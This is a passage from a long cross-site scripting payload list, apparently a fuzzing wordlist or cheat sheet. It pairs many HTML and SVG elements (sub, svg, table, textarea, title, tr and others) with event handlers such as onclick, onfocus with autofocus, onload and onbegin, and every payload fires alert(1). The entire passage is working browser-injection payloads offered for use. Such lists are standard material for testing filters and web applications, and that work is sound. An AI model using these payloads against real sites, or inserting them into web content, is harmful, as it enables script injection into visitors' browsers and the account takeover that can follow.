onblur=alert(1) tabindex=1 id=x></sub><input autofocus> +<sub onclick="alert(1)">test</sub> +<sub 
oncontextmenu="alert(1)">test</sub> +<sub oncopy="alert(1)" contenteditable>test</sub> +<sub oncut="alert(1)" contenteditable>test</sub> +<sub ondblclick="alert(1)">test</sub> +<sub onfocusout=alert(1) tabindex=1 id=x></sub><input autofocus> +<sub onkeydown="alert(1)" contenteditable>test</sub> +<sub onkeypress="alert(1)" contenteditable>test</sub> +<sub onkeyup="alert(1)" contenteditable>test</sub> +<sub onmousedown="alert(1)">test</sub> +<sub onmouseenter="alert(1)">test</sub> +<sub onmouseleave="alert(1)">test</sub> +<sub onmousemove="alert(1)">test</sub> +<sub onmouseout="alert(1)">test</sub> +<sub onmouseover="alert(1)">test</sub> +<sub onmouseup="alert(1)">test</sub> +<sub onpaste="alert(1)" contenteditable>test</sub> +<summary draggable="true" ondrag="alert(1)">test</summary> +<summary draggable="true" ondragend="alert(1)">test</summary> +<summary draggable="true" ondragenter="alert(1)">test</summary> +<summary draggable="true" ondragleave="alert(1)">test</summary> +<summary draggable="true" ondragstart="alert(1)">test</summary> +<summary id=x tabindex=1 onactivate=alert(1)></summary> +<summary id=x tabindex=1 onbeforeactivate=alert(1)></summary> +<summary id=x tabindex=1 onbeforedeactivate=alert(1)></summary><input autofocus> +<summary id=x tabindex=1 ondeactivate=alert(1)></summary><input id=y autofocus> +<summary id=x tabindex=1 onfocus=alert(1)></summary> +<summary id=x tabindex=1 onfocusin=alert(1)></summary> +<summary onbeforecopy="alert(1)" contenteditable>test</summary> +<summary onbeforecut="alert(1)" contenteditable>test</summary> +<summary onbeforepaste="alert(1)" contenteditable>test</summary> +<summary onblur=alert(1) tabindex=1 id=x></summary><input autofocus> +<summary onclick="alert(1)">test</summary> +<summary oncontextmenu="alert(1)">test</summary> +<summary oncopy="alert(1)" contenteditable>test</summary> +<summary oncut="alert(1)" contenteditable>test</summary> +<summary ondblclick="alert(1)">test</summary> +<summary onfocusout=alert(1) 
tabindex=1 id=x></summary><input autofocus> +<summary onkeydown="alert(1)" contenteditable>test</summary> +<summary onkeypress="alert(1)" contenteditable>test</summary> +<summary onkeyup="alert(1)" contenteditable>test</summary> +<summary onmousedown="alert(1)">test</summary> +<summary onmouseenter="alert(1)">test</summary> +<summary onmouseleave="alert(1)">test</summary> +<summary onmousemove="alert(1)">test</summary> +<summary onmouseout="alert(1)">test</summary> +<summary onmouseover="alert(1)">test</summary> +<summary onmouseup="alert(1)">test</summary> +<summary onpaste="alert(1)" contenteditable>test</summary> +<sup draggable="true" ondrag="alert(1)">test</sup> +<sup draggable="true" ondragend="alert(1)">test</sup> +<sup draggable="true" ondragenter="alert(1)">test</sup> +<sup draggable="true" ondragleave="alert(1)">test</sup> +<sup draggable="true" ondragstart="alert(1)">test</sup> +<sup id=x tabindex=1 onactivate=alert(1)></sup> +<sup id=x tabindex=1 onbeforeactivate=alert(1)></sup> +<sup id=x tabindex=1 onbeforedeactivate=alert(1)></sup><input autofocus> +<sup id=x tabindex=1 ondeactivate=alert(1)></sup><input id=y autofocus> +<sup id=x tabindex=1 onfocus=alert(1)></sup> +<sup id=x tabindex=1 onfocusin=alert(1)></sup> +<sup onbeforecopy="alert(1)" contenteditable>test</sup> +<sup onbeforecut="alert(1)" contenteditable>test</sup> +<sup onbeforepaste="alert(1)" contenteditable>test</sup> +<sup onblur=alert(1) tabindex=1 id=x></sup><input autofocus> +<sup onclick="alert(1)">test</sup> +<sup oncontextmenu="alert(1)">test</sup> +<sup oncopy="alert(1)" contenteditable>test</sup> +<sup oncut="alert(1)" contenteditable>test</sup> +<sup ondblclick="alert(1)">test</sup> +<sup onfocusout=alert(1) tabindex=1 id=x></sup><input autofocus> +<sup onkeydown="alert(1)" contenteditable>test</sup> +<sup onkeypress="alert(1)" contenteditable>test</sup> +<sup onkeyup="alert(1)" contenteditable>test</sup> +<sup onmousedown="alert(1)">test</sup> +<sup 
onmouseenter="alert(1)">test</sup> +<sup onmouseleave="alert(1)">test</sup> +<sup onmousemove="alert(1)">test</sup> +<sup onmouseout="alert(1)">test</sup> +<sup onmouseover="alert(1)">test</sup> +<sup onmouseup="alert(1)">test</sup> +<sup onpaste="alert(1)" contenteditable>test</sup> +<svg draggable="true" ondrag="alert(1)">test</svg> +<svg draggable="true" ondragend="alert(1)">test</svg> +<svg draggable="true" ondragenter="alert(1)">test</svg> +<svg draggable="true" ondragleave="alert(1)">test</svg> +<svg draggable="true" ondragstart="alert(1)">test</svg> +<svg id=x onfocus=alert(1)> +<svg id=x onfocusin=alert(1)> +<svg id=x tabindex=1 onactivate=alert(1)></svg> +<svg id=x tabindex=1 onbeforeactivate=alert(1)></svg> +<svg id=x tabindex=1 onbeforedeactivate=alert(1)></svg><input autofocus> +<svg id=x tabindex=1 ondeactivate=alert(1)></svg><input id=y autofocus> +<svg onbeforecopy="alert(1)" contenteditable>test</svg> +<svg onbeforecut="alert(1)" contenteditable>test</svg> +<svg onbeforepaste="alert(1)" contenteditable>test</svg> +<svg onblur=alert(1) tabindex=1 id=x></svg><input autofocus> +<svg onclick="alert(1)">test</svg> +<svg oncontextmenu="alert(1)">test</svg> +<svg oncopy="alert(1)" contenteditable>test</svg> +<svg oncut="alert(1)" contenteditable>test</svg> +<svg ondblclick="alert(1)">test</svg> +<svg onfocusout=alert(1) tabindex=1 id=x></svg><input autofocus> +<svg onkeydown="alert(1)" contenteditable>test</svg> +<svg onkeypress="alert(1)" contenteditable>test</svg> +<svg onkeyup="alert(1)" contenteditable>test</svg> +<svg onload=alert(1)> +<svg onmousedown="alert(1)">test</svg> +<svg onmouseenter="alert(1)">test</svg> +<svg onmouseleave="alert(1)">test</svg> +<svg onmousemove="alert(1)">test</svg> +<svg onmouseout="alert(1)">test</svg> +<svg onmouseover="alert(1)">test</svg> +<svg onmouseup="alert(1)">test</svg> +<svg onpaste="alert(1)" contenteditable>test</svg> +<svg onunload=window.open('javascript:alert(1)')> +<svg><a onload=alert(1)></a> +<svg><abbr 
onload=alert(1)></abbr> +<svg><acronym onload=alert(1)></acronym> +<svg><address onload=alert(1)></address> +<svg><animate onbegin=alert(1) attributeName=x dur=1s> +<svg><animate onend=alert(1) attributeName=x dur=1s> +<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 /> +<svg><animatetransform onbegin=alert(1) attributeName=transform> +<svg><animatetransform onend=alert(1) attributeName=transform dur=1s> +<svg><animatetransform onrepeat=alert(1) attributeName=transform repeatCount=2 dur=1s> +<svg><applet onload=alert(1)></applet> +<svg><area onload=alert(1)></area> +<svg><article onload=alert(1)></article> +<svg><aside onload=alert(1)></aside> +<svg><audio onload=alert(1)></audio> +<svg><b onload=alert(1)></b> +<svg><base onload=alert(1)></base> +<svg><basefont onload=alert(1)></basefont> +<svg><bdi onload=alert(1)></bdi> +<svg><bdo onload=alert(1)></bdo> +<svg><bgsound onload=alert(1)></bgsound> +<svg><big onload=alert(1)></big> +<svg><blink onload=alert(1)></blink> +<svg><blockquote onload=alert(1)></blockquote> +<svg><br onload=alert(1)></br> +<svg><button onload=alert(1)></button> +<svg><canvas onload=alert(1)></canvas> +<svg><caption onload=alert(1)></caption> +<svg><center onload=alert(1)></center> +<svg><cite onload=alert(1)></cite> +<svg><code onload=alert(1)></code> +<svg><col onload=alert(1)></col> +<svg><colgroup onload=alert(1)></colgroup> +<svg><command onload=alert(1)></command> +<svg><content onload=alert(1)></content> +<svg><data onload=alert(1)></data> +<svg><datalist onload=alert(1)></datalist> +<svg><dd onload=alert(1)></dd> +<svg><del onload=alert(1)></del> +<svg><details onload=alert(1)></details> +<svg><dfn onload=alert(1)></dfn> +<svg><dialog onload=alert(1)></dialog> +<svg><dir onload=alert(1)></dir> +<svg><discard onbegin=alert(1)> +<svg><div onload=alert(1)></div> +<svg><dl onload=alert(1)></dl> +<svg><dt onload=alert(1)></dt> +<svg><element onload=alert(1)></element> +<svg><em onload=alert(1)></em> +<svg><fieldset 
onload=alert(1)></fieldset> +<svg><figcaption onload=alert(1)></figcaption> +<svg><figure onload=alert(1)></figure> +<svg><font onload=alert(1)></font> +<svg><footer onload=alert(1)></footer> +<svg><form onload=alert(1)></form> +<svg><frameset onload=alert(1)></frameset> +<svg><h1 onload=alert(1)></h1> +<svg><head onload=alert(1)></head> +<svg><header onload=alert(1)></header> +<svg><hgroup onload=alert(1)></hgroup> +<svg><hr onload=alert(1)></hr> +<svg><html onload=alert(1)></html> +<svg><i onload=alert(1)></i> +<svg><image href=1 onerror=alert(1)> +<svg><image href=validimage.png onload=alert(1)> +<svg><ins onload=alert(1)></ins> +<svg><kbd onload=alert(1)></kbd> +<svg><keygen onload=alert(1)></keygen> +<svg><label onload=alert(1)></label> +<svg><legend onload=alert(1)></legend> +<svg><li onload=alert(1)></li> +<svg><listing onload=alert(1)></listing> +<svg><main onload=alert(1)></main> +<svg><map onload=alert(1)></map> +<svg><mark onload=alert(1)></mark> +<svg><marquee onload=alert(1)></marquee> +<svg><menu onload=alert(1)></menu> +<svg><menuitem onload=alert(1)></menuitem> +<svg><meta onload=alert(1)></meta> +<svg><meter onload=alert(1)></meter> +<svg><multicol onload=alert(1)></multicol> +<svg><nav onload=alert(1)></nav> +<svg><nextid onload=alert(1)></nextid> +<svg><nobr onload=alert(1)></nobr> +<svg><noembed onload=alert(1)></noembed> +<svg><noframes onload=alert(1)></noframes> +<svg><noscript onload=alert(1)></noscript> +<svg><ol onload=alert(1)></ol> +<svg><optgroup onload=alert(1)></optgroup> +<svg><option onload=alert(1)></option> +<svg><output onload=alert(1)></output> +<svg><p onload=alert(1)></p> +<svg><param onload=alert(1)></param> +<svg><path><animateMotion onbegin=alert(1) dur="1s" repeatCount="1"> +<svg><path><animateMotion onend=alert(1) dur=1s repeatCount=1> +<svg><path><animateMotion onrepeat=alert(1) dur="1s" repeatCount="2"> +<svg><picture onload=alert(1)></picture> +<svg><plaintext onload=alert(1)></plaintext> +<svg><pre 
onload=alert(1)></pre> +<svg><progress onload=alert(1)></progress> +<svg><q onload=alert(1)></q> +<svg><rb onload=alert(1)></rb> +<svg><rp onload=alert(1)></rp> +<svg><rt onload=alert(1)></rt> +<svg><rtc onload=alert(1)></rtc> +<svg><ruby onload=alert(1)></ruby> +<svg><s onload=alert(1)></s> +<svg><samp onload=alert(1)></samp> +<svg><section onload=alert(1)></section> +<svg><select onload=alert(1)></select> +<svg><set onbegin=alert(1) attributename=x dur=1s> +<svg><set onend=alert(1) attributename=x dur=1s> +<svg><set onrepeat=alert(1) attributename=x dur=1s repeatcount=2> +<svg><shadow onload=alert(1)></shadow> +<svg><slot onload=alert(1)></slot> +<svg><small onload=alert(1)></small> +<svg><source onload=alert(1)></source> +<svg><spacer onload=alert(1)></spacer> +<svg><span onload=alert(1)></span> +<svg><strike onload=alert(1)></strike> +<svg><strong onload=alert(1)></strong> +<svg><sub onload=alert(1)></sub> +<svg><summary onload=alert(1)></summary> +<svg><sup onload=alert(1)></sup> +<svg><table onload=alert(1)></table> +<svg><tbody onload=alert(1)></tbody> +<svg><td onload=alert(1)></td> +<svg><template onload=alert(1)></template> +<svg><textarea onload=alert(1)></textarea> +<svg><tfoot onload=alert(1)></tfoot> +<svg><th onload=alert(1)></th> +<svg><thead onload=alert(1)></thead> +<svg><time onload=alert(1)></time> +<svg><title onload=alert(1)></title> +<svg><tr onload=alert(1)></tr> +<svg><tt onload=alert(1)></tt> +<svg><u onload=alert(1)></u> +<svg><ul onload=alert(1)></ul> +<svg><var onload=alert(1)></var> +<svg><video onload=alert(1)></video> +<svg><wbr onload=alert(1)></wbr> +<svg><xmp onload=alert(1)></xmp> +<svg><xss onload=alert(1)></xss> +<table draggable="true" ondrag="alert(1)">test</table> +<table draggable="true" ondragend="alert(1)">test</table> +<table draggable="true" ondragenter="alert(1)">test</table> +<table draggable="true" ondragleave="alert(1)">test</table> +<table draggable="true" ondragstart="alert(1)">test</table> +<table id=x tabindex=1 
onactivate=alert(1)></table> +<table id=x tabindex=1 onbeforeactivate=alert(1)></table> +<table id=x tabindex=1 onbeforedeactivate=alert(1)></table><input autofocus> +<table id=x tabindex=1 ondeactivate=alert(1)></table><input id=y autofocus> +<table id=x tabindex=1 onfocus=alert(1)></table> +<table id=x tabindex=1 onfocusin=alert(1)></table> +<table onbeforecopy="alert(1)" contenteditable>test</table> +<table onbeforecut="alert(1)" contenteditable>test</table> +<table onbeforepaste="alert(1)" contenteditable>test</table> +<table onblur=alert(1) tabindex=1 id=x></table><input autofocus> +<table onclick="alert(1)">test</table> +<table oncontextmenu="alert(1)">test</table> +<table oncopy="alert(1)" contenteditable>test</table> +<table oncut="alert(1)" contenteditable>test</table> +<table ondblclick="alert(1)">test</table> +<table onfocusout=alert(1) tabindex=1 id=x></table><input autofocus> +<table onkeydown="alert(1)" contenteditable>test</table> +<table onkeypress="alert(1)" contenteditable>test</table> +<table onkeyup="alert(1)" contenteditable>test</table> +<table onmousedown="alert(1)">test</table> +<table onmouseenter="alert(1)">test</table> +<table onmouseleave="alert(1)">test</table> +<table onmousemove="alert(1)">test</table> +<table onmouseout="alert(1)">test</table> +<table onmouseover="alert(1)">test</table> +<table onmouseup="alert(1)">test</table> +<table onpaste="alert(1)" contenteditable>test</table> +<tbody draggable="true" ondrag="alert(1)">test</tbody> +<tbody draggable="true" ondragend="alert(1)">test</tbody> +<tbody draggable="true" ondragenter="alert(1)">test</tbody> +<tbody draggable="true" ondragleave="alert(1)">test</tbody> +<tbody draggable="true" ondragstart="alert(1)">test</tbody> +<tbody id=x tabindex=1 onactivate=alert(1)></tbody> +<tbody id=x tabindex=1 onbeforeactivate=alert(1)></tbody> +<tbody id=x tabindex=1 onbeforedeactivate=alert(1)></tbody><input autofocus> +<tbody id=x tabindex=1 ondeactivate=alert(1)></tbody><input id=y 
autofocus> +<tbody id=x tabindex=1 onfocus=alert(1)></tbody> +<tbody id=x tabindex=1 onfocusin=alert(1)></tbody> +<tbody onbeforecopy="alert(1)" contenteditable>test</tbody> +<tbody onbeforecut="alert(1)" contenteditable>test</tbody> +<tbody onbeforepaste="alert(1)" contenteditable>test</tbody> +<tbody onblur=alert(1) tabindex=1 id=x></tbody><input autofocus> +<tbody onclick="alert(1)">test</tbody> +<tbody oncontextmenu="alert(1)">test</tbody> +<tbody oncopy="alert(1)" contenteditable>test</tbody> +<tbody oncut="alert(1)" contenteditable>test</tbody> +<tbody ondblclick="alert(1)">test</tbody> +<tbody onfocusout=alert(1) tabindex=1 id=x></tbody><input autofocus> +<tbody onkeydown="alert(1)" contenteditable>test</tbody> +<tbody onkeypress="alert(1)" contenteditable>test</tbody> +<tbody onkeyup="alert(1)" contenteditable>test</tbody> +<tbody onmousedown="alert(1)">test</tbody> +<tbody onmouseenter="alert(1)">test</tbody> +<tbody onmouseleave="alert(1)">test</tbody> +<tbody onmousemove="alert(1)">test</tbody> +<tbody onmouseout="alert(1)">test</tbody> +<tbody onmouseover="alert(1)">test</tbody> +<tbody onmouseup="alert(1)">test</tbody> +<tbody onpaste="alert(1)" contenteditable>test</tbody> +<td draggable="true" ondrag="alert(1)">test</td> +<td draggable="true" ondragend="alert(1)">test</td> +<td draggable="true" ondragenter="alert(1)">test</td> +<td draggable="true" ondragleave="alert(1)">test</td> +<td draggable="true" ondragstart="alert(1)">test</td> +<td id=x tabindex=1 onactivate=alert(1)></td> +<td id=x tabindex=1 onbeforeactivate=alert(1)></td> +<td id=x tabindex=1 onbeforedeactivate=alert(1)></td><input autofocus> +<td id=x tabindex=1 ondeactivate=alert(1)></td><input id=y autofocus> +<td id=x tabindex=1 onfocus=alert(1)></td> +<td id=x tabindex=1 onfocusin=alert(1)></td> +<td onbeforecopy="alert(1)" contenteditable>test</td> +<td onbeforecut="alert(1)" contenteditable>test</td> +<td onbeforepaste="alert(1)" contenteditable>test</td> +<td onblur=alert(1) 
tabindex=1 id=x></td><input autofocus> +<td onclick="alert(1)">test</td> +<td oncontextmenu="alert(1)">test</td> +<td oncopy="alert(1)" contenteditable>test</td> +<td oncut="alert(1)" contenteditable>test</td> +<td ondblclick="alert(1)">test</td> +<td onfocusout=alert(1) tabindex=1 id=x></td><input autofocus> +<td onkeydown="alert(1)" contenteditable>test</td> +<td onkeypress="alert(1)" contenteditable>test</td> +<td onkeyup="alert(1)" contenteditable>test</td> +<td onmousedown="alert(1)">test</td> +<td onmouseenter="alert(1)">test</td> +<td onmouseleave="alert(1)">test</td> +<td onmousemove="alert(1)">test</td> +<td onmouseout="alert(1)">test</td> +<td onmouseover="alert(1)">test</td> +<td onmouseup="alert(1)">test</td> +<td onpaste="alert(1)" contenteditable>test</td> +<template draggable="true" ondrag="alert(1)">test</template> +<template draggable="true" ondragend="alert(1)">test</template> +<template draggable="true" ondragenter="alert(1)">test</template> +<template draggable="true" ondragleave="alert(1)">test</template> +<template draggable="true" ondragstart="alert(1)">test</template> +<template id=x tabindex=1 onactivate=alert(1)></template> +<template id=x tabindex=1 onbeforeactivate=alert(1)></template> +<template id=x tabindex=1 onbeforedeactivate=alert(1)></template><input autofocus> +<template id=x tabindex=1 ondeactivate=alert(1)></template><input id=y autofocus> +<template id=x tabindex=1 onfocus=alert(1)></template> +<template id=x tabindex=1 onfocusin=alert(1)></template> +<template onbeforecopy="alert(1)" contenteditable>test</template> +<template onbeforecut="alert(1)" contenteditable>test</template> +<template onbeforepaste="alert(1)" contenteditable>test</template> +<template onblur=alert(1) tabindex=1 id=x></template><input autofocus> +<template onclick="alert(1)">test</template> +<template oncontextmenu="alert(1)">test</template> +<template oncopy="alert(1)" contenteditable>test</template> +<template oncut="alert(1)" 
contenteditable>test</template> +<template ondblclick="alert(1)">test</template> +<template onfocusout=alert(1) tabindex=1 id=x></template><input autofocus> +<template onkeydown="alert(1)" contenteditable>test</template> +<template onkeypress="alert(1)" contenteditable>test</template> +<template onkeyup="alert(1)" contenteditable>test</template> +<template onmousedown="alert(1)">test</template> +<template onmouseenter="alert(1)">test</template> +<template onmouseleave="alert(1)">test</template> +<template onmousemove="alert(1)">test</template> +<template onmouseout="alert(1)">test</template> +<template onmouseover="alert(1)">test</template> +<template onmouseup="alert(1)">test</template> +<template onpaste="alert(1)" contenteditable>test</template> +<textarea autofocus onfocus=alert(1)>test</textarea> +<textarea autofocus onfocusin=alert(1)>test</textarea> +<textarea draggable="true" ondrag="alert(1)">test</textarea> +<textarea draggable="true" ondragend="alert(1)">test</textarea> +<textarea draggable="true" ondragenter="alert(1)">test</textarea> +<textarea draggable="true" ondragleave="alert(1)">test</textarea> +<textarea draggable="true" ondragstart="alert(1)">test</textarea> +<textarea id=x tabindex=1 onactivate=alert(1)></textarea> +<textarea id=x tabindex=1 onbeforeactivate=alert(1)></textarea> +<textarea id=x tabindex=1 onbeforedeactivate=alert(1)></textarea><input autofocus> +<textarea id=x tabindex=1 ondeactivate=alert(1)></textarea><input id=y autofocus> +<textarea onauxclick=alert(1)>XSS</textarea> +<textarea onbeforecopy=alert(1) autofocus>XSS</textarea> +<textarea onbeforecut=alert(1) autofocus>XSS</textarea> +<textarea onbeforepaste=alert(1) autofocus></textarea> +<textarea onblur=alert(1) id=x></textarea><input autofocus> +<textarea onchange=alert(1)>XSS</textarea> +<textarea onclick="alert(1)">test</textarea> +<textarea oncontextmenu="alert(1)">test</textarea> +<textarea oncopy=alert(1) autofocus>XSS</textarea> +<textarea oncut=alert(1) 
autofocus>XSS</textarea> +<textarea ondblclick="alert(1)">test</textarea> +<textarea onfocusout=alert(1) id=x></textarea><input autofocus> +<textarea oninput=alert(1)>XSS</textarea> +<textarea onkeydown="alert(1)" contenteditable>test</textarea> +<textarea onkeypress="alert(1)" contenteditable>test</textarea> +<textarea onkeyup="alert(1)" contenteditable>test</textarea> +<textarea onmousedown="alert(1)">test</textarea> +<textarea onmouseenter="alert(1)">test</textarea> +<textarea onmouseleave="alert(1)">test</textarea> +<textarea onmousemove="alert(1)">test</textarea> +<textarea onmouseout="alert(1)">test</textarea> +<textarea onmouseover="alert(1)">test</textarea> +<textarea onmouseup="alert(1)">test</textarea> +<textarea onpaste=alert(1) autofocus></textarea> +<textarea onselect=alert(1) autofocus>XSS</textarea> +<tfoot draggable="true" ondrag="alert(1)">test</tfoot> +<tfoot draggable="true" ondragend="alert(1)">test</tfoot> +<tfoot draggable="true" ondragenter="alert(1)">test</tfoot> +<tfoot draggable="true" ondragleave="alert(1)">test</tfoot> +<tfoot draggable="true" ondragstart="alert(1)">test</tfoot> +<tfoot id=x tabindex=1 onactivate=alert(1)></tfoot> +<tfoot id=x tabindex=1 onbeforeactivate=alert(1)></tfoot> +<tfoot id=x tabindex=1 onbeforedeactivate=alert(1)></tfoot><input autofocus> +<tfoot id=x tabindex=1 ondeactivate=alert(1)></tfoot><input id=y autofocus> +<tfoot id=x tabindex=1 onfocus=alert(1)></tfoot> +<tfoot id=x tabindex=1 onfocusin=alert(1)></tfoot> +<tfoot onbeforecopy="alert(1)" contenteditable>test</tfoot> +<tfoot onbeforecut="alert(1)" contenteditable>test</tfoot> +<tfoot onbeforepaste="alert(1)" contenteditable>test</tfoot> +<tfoot onblur=alert(1) tabindex=1 id=x></tfoot><input autofocus> +<tfoot onclick="alert(1)">test</tfoot> +<tfoot oncontextmenu="alert(1)">test</tfoot> +<tfoot oncopy="alert(1)" contenteditable>test</tfoot> +<tfoot oncut="alert(1)" contenteditable>test</tfoot> +<tfoot ondblclick="alert(1)">test</tfoot> +<tfoot 
onfocusout=alert(1) tabindex=1 id=x></tfoot><input autofocus> +<tfoot onkeydown="alert(1)" contenteditable>test</tfoot> +<tfoot onkeypress="alert(1)" contenteditable>test</tfoot> +<tfoot onkeyup="alert(1)" contenteditable>test</tfoot> +<tfoot onmousedown="alert(1)">test</tfoot> +<tfoot onmouseenter="alert(1)">test</tfoot> +<tfoot onmouseleave="alert(1)">test</tfoot> +<tfoot onmousemove="alert(1)">test</tfoot> +<tfoot onmouseout="alert(1)">test</tfoot> +<tfoot onmouseover="alert(1)">test</tfoot> +<tfoot onmouseup="alert(1)">test</tfoot> +<tfoot onpaste="alert(1)" contenteditable>test</tfoot> +<th draggable="true" ondrag="alert(1)">test</th> +<th draggable="true" ondragend="alert(1)">test</th> +<th draggable="true" ondragenter="alert(1)">test</th> +<th draggable="true" ondragleave="alert(1)">test</th> +<th draggable="true" ondragstart="alert(1)">test</th> +<th id=x tabindex=1 onactivate=alert(1)></th> +<th id=x tabindex=1 onbeforeactivate=alert(1)></th> +<th id=x tabindex=1 onbeforedeactivate=alert(1)></th><input autofocus> +<th id=x tabindex=1 ondeactivate=alert(1)></th><input id=y autofocus> +<th id=x tabindex=1 onfocus=alert(1)></th> +<th id=x tabindex=1 onfocusin=alert(1)></th> +<th onbeforecopy="alert(1)" contenteditable>test</th> +<th onbeforecut="alert(1)" contenteditable>test</th> +<th onbeforepaste="alert(1)" contenteditable>test</th> +<th onblur=alert(1) tabindex=1 id=x></th><input autofocus> +<th onclick="alert(1)">test</th> +<th oncontextmenu="alert(1)">test</th> +<th oncopy="alert(1)" contenteditable>test</th> +<th oncut="alert(1)" contenteditable>test</th> +<th ondblclick="alert(1)">test</th> +<th onfocusout=alert(1) tabindex=1 id=x></th><input autofocus> +<th onkeydown="alert(1)" contenteditable>test</th> +<th onkeypress="alert(1)" contenteditable>test</th> +<th onkeyup="alert(1)" contenteditable>test</th> +<th onmousedown="alert(1)">test</th> +<th onmouseenter="alert(1)">test</th> +<th onmouseleave="alert(1)">test</th> +<th 
onmousemove="alert(1)">test</th> +<th onmouseout="alert(1)">test</th> +<th onmouseover="alert(1)">test</th> +<th onmouseup="alert(1)">test</th> +<th onpaste="alert(1)" contenteditable>test</th> +<thead draggable="true" ondrag="alert(1)">test</thead> +<thead draggable="true" ondragend="alert(1)">test</thead> +<thead draggable="true" ondragenter="alert(1)">test</thead> +<thead draggable="true" ondragleave="alert(1)">test</thead> +<thead draggable="true" ondragstart="alert(1)">test</thead> +<thead id=x tabindex=1 onactivate=alert(1)></thead> +<thead id=x tabindex=1 onbeforeactivate=alert(1)></thead> +<thead id=x tabindex=1 onbeforedeactivate=alert(1)></thead><input autofocus> +<thead id=x tabindex=1 ondeactivate=alert(1)></thead><input id=y autofocus> +<thead id=x tabindex=1 onfocus=alert(1)></thead> +<thead id=x tabindex=1 onfocusin=alert(1)></thead> +<thead onbeforecopy="alert(1)" contenteditable>test</thead> +<thead onbeforecut="alert(1)" contenteditable>test</thead> +<thead onbeforepaste="alert(1)" contenteditable>test</thead> +<thead onblur=alert(1) tabindex=1 id=x></thead><input autofocus> +<thead onclick="alert(1)">test</thead> +<thead oncontextmenu="alert(1)">test</thead> +<thead oncopy="alert(1)" contenteditable>test</thead> +<thead oncut="alert(1)" contenteditable>test</thead> +<thead ondblclick="alert(1)">test</thead> +<thead onfocusout=alert(1) tabindex=1 id=x></thead><input autofocus> +<thead onkeydown="alert(1)" contenteditable>test</thead> +<thead onkeypress="alert(1)" contenteditable>test</thead> +<thead onkeyup="alert(1)" contenteditable>test</thead> +<thead onmousedown="alert(1)">test</thead> +<thead onmouseenter="alert(1)">test</thead> +<thead onmouseleave="alert(1)">test</thead> +<thead onmousemove="alert(1)">test</thead> +<thead onmouseout="alert(1)">test</thead> +<thead onmouseover="alert(1)">test</thead> +<thead onmouseup="alert(1)">test</thead> +<thead onpaste="alert(1)" contenteditable>test</thead> +<time draggable="true" 
ondrag="alert(1)">test</time> +<time draggable="true" ondragend="alert(1)">test</time> +<time draggable="true" ondragenter="alert(1)">test</time> +<time draggable="true" ondragleave="alert(1)">test</time> +<time draggable="true" ondragstart="alert(1)">test</time> +<time id=x tabindex=1 onactivate=alert(1)></time> +<time id=x tabindex=1 onbeforeactivate=alert(1)></time> +<time id=x tabindex=1 onbeforedeactivate=alert(1)></time><input autofocus> +<time id=x tabindex=1 ondeactivate=alert(1)></time><input id=y autofocus> +<time id=x tabindex=1 onfocus=alert(1)></time> +<time id=x tabindex=1 onfocusin=alert(1)></time> +<time onbeforecopy="alert(1)" contenteditable>test</time> +<time onbeforecut="alert(1)" contenteditable>test</time> +<time onbeforepaste="alert(1)" contenteditable>test</time> +<time onblur=alert(1) tabindex=1 id=x></time><input autofocus> +<time onclick="alert(1)">test</time> +<time oncontextmenu="alert(1)">test</time> +<time oncopy="alert(1)" contenteditable>test</time> +<time oncut="alert(1)" contenteditable>test</time> +<time ondblclick="alert(1)">test</time> +<time onfocusout=alert(1) tabindex=1 id=x></time><input autofocus> +<time onkeydown="alert(1)" contenteditable>test</time> +<time onkeypress="alert(1)" contenteditable>test</time> +<time onkeyup="alert(1)" contenteditable>test</time> +<time onmousedown="alert(1)">test</time> +<time onmouseenter="alert(1)">test</time> +<time onmouseleave="alert(1)">test</time> +<time onmousemove="alert(1)">test</time> +<time onmouseout="alert(1)">test</time> +<time onmouseover="alert(1)">test</time> +<time onmouseup="alert(1)">test</time> +<time onpaste="alert(1)" contenteditable>test</time> +<title draggable="true" ondrag="alert(1)">test</title> +<title draggable="true" ondragend="alert(1)">test</title> +<title draggable="true" ondragenter="alert(1)">test</title> +<title draggable="true" ondragleave="alert(1)">test</title> +<title draggable="true" ondragstart="alert(1)">test</title> +<title id=x tabindex=1 
onactivate=alert(1)></title> +<title id=x tabindex=1 onbeforeactivate=alert(1)></title> +<title id=x tabindex=1 onbeforedeactivate=alert(1)></title><input autofocus> +<title id=x tabindex=1 ondeactivate=alert(1)></title><input id=y autofocus> +<title id=x tabindex=1 onfocus=alert(1)></title> +<title id=x tabindex=1 onfocusin=alert(1)></title> +<title onbeforecopy="alert(1)" contenteditable>test</title> +<title onbeforecut="alert(1)" contenteditable>test</title> +<title onbeforepaste="alert(1)" contenteditable>test</title> +<title onblur=alert(1) tabindex=1 id=x></title><input autofocus> +<title onclick="alert(1)">test</title> +<title oncontextmenu="alert(1)">test</title> +<title oncopy="alert(1)" contenteditable>test</title> +<title oncut="alert(1)" contenteditable>test</title> +<title ondblclick="alert(1)">test</title> +<title onfocusout=alert(1) tabindex=1 id=x></title><input autofocus> +<title onkeydown="alert(1)" contenteditable>test</title> +<title onkeypress="alert(1)" contenteditable>test</title> +<title onkeyup="alert(1)" contenteditable>test</title> +<title onmousedown="alert(1)">test</title> +<title onmouseenter="alert(1)">test</title> +<title onmouseleave="alert(1)">test</title> +<title onmousemove="alert(1)">test</title> +<title onmouseout="alert(1)">test</title> +<title onmouseover="alert(1)">test</title> +<title onmouseup="alert(1)">test</title> +<title onpaste="alert(1)" contenteditable>test</title> +<tr draggable="true" ondrag="alert(1)">test</tr> +<tr draggable="true" ondragend="alert(1)">test</tr> +<tr draggable="true" ondragenter="alert(1)">test</tr> +<tr draggable="true" ondragleave="alert(1)">test</tr> +<tr draggable="true" ondragstart="alert(1)">test</tr> +<tr id=x tabindex=1 onactivate=alert(1)></tr> +<tr id=x tabindex=1 onbeforeactivate=alert(1)></tr> +<tr id=x tabindex=1 onbeforedeactivate=alert(1)></tr><input autofocus> +<tr id=x tabindex=1 ondeactivate=alert(1)></tr><input id=y autofocus> +<tr id=x tabindex=1 onfocus=alert(1)></tr> +<tr 
